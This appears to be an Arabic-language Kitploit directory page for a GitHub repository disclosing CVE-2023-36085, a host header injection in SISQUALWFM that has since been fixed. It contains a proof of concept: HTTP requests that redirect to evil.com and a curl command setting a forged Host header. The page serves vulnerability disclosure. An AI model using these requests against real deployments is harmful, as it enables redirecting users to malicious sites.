Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — يحتوي هذا المستودع على معلومات متعلقة بـ CVE-2023-36085، وهي ثغرة حقن في ترويسة المضيف (host header injection) تم اكتشافها في SISQUALWFM الإصدار 7.1.319.103، والتي تسمح للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع ضار. تم تخصيص هذا الثغرة CVE-2023-36085 وقد تم إصلاحها في الإصدار 7.1.319.111 وما فوق. | Kitploit
أدوات/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

يحتوي هذا المستودع على معلومات متعلقة بـ CVE-2023-36085، وهي ثغرة حقن في ترويسة المضيف (host header injection) تم اكتشافها في SISQUALWFM الإصدار 7.1.319.103، والتي تسمح للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع ضار. تم تخصيص هذا الثغرة CVE-2023-36085 وقد تم إصلاحها في الإصدار 7.1.319.111 وما فوق.

مشاركة

CVE-2023-36085 ثغرة حقن ترويسة المضيف في SISQUALWFM

هذا المستودع يحتوي على معلومات متعلقة بثغرة حقن ترويسة المضيف المكتشفة في إصدار SISQUALWFM 7.1.319.103، والتي تسمح للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع ضار. تم تخصيص CVE-2023-36085 لهذه الثغرة وتم إصلاحها في الإصدار 7.1.319.111 وما فوق.

تفاصيل الثغرة

  • عنوان الاستغلال: حقن ترويسة المضيف في SISQUALWFM 7.1.319.103
  • تاريخ الاكتشاف: 17/03/2023
  • تاريخ الإبلاغ: 17/03/2023
  • تاريخ الحل: 13/10/2023
  • مؤلف الاستغلال: Omer Shaik (unknown_exploit)
  • الصفحة الرئيسية للبائع: SISQUALWFM
  • الإصدار: 7.1.319.103
  • تم الاختبار على: SISQUAL WFM 7.1.319.103
  • الإصدار المتأثر: SISQUALWFM 7.1.319.103
  • الإصدار المُصلَح: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • درجة CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • الفئة: تطبيقات الويب

إثبات المفهوم

نقدم سيناريو إثبات مفهوم يوضح ثغرة حقن ترويسة المضيف، مستهدفًا على وجه التحديد نقطة النهاية /sisqualIdentityServer/core. تسمح هذه الثغرة للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع آخر عن طريق العبث بترويسة المضيف.

الطلب الأصلي

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

الاستجابة الأصلية

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

الطلب المعترض (معدّل لإعادة التوجيه إلى evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

الاستجابة

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

تنفيذ الاستغلال

طريقة الهجوم

لاستغلال هذه الثغرة، يمكن للمهاجم استخدام أمر curl التالي لتعديل ترويسة المضيف:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

إخلاء مسؤولية

هذا المستودع لأغراض إعلامية فقط ولا ينبغي استخدامه لأي أنشطة ضارة. تم الإبلاغ عن الثغرة بشكل مسؤول إلى البائع، وتم حل المشكلة. من الضروري اتباع إرشادات القرصنة الأخلاقية واحترام ممارسات الإفصاح المسؤول عند اكتشاف الثغرات والإبلاغ عنها.

تنزيل الأداة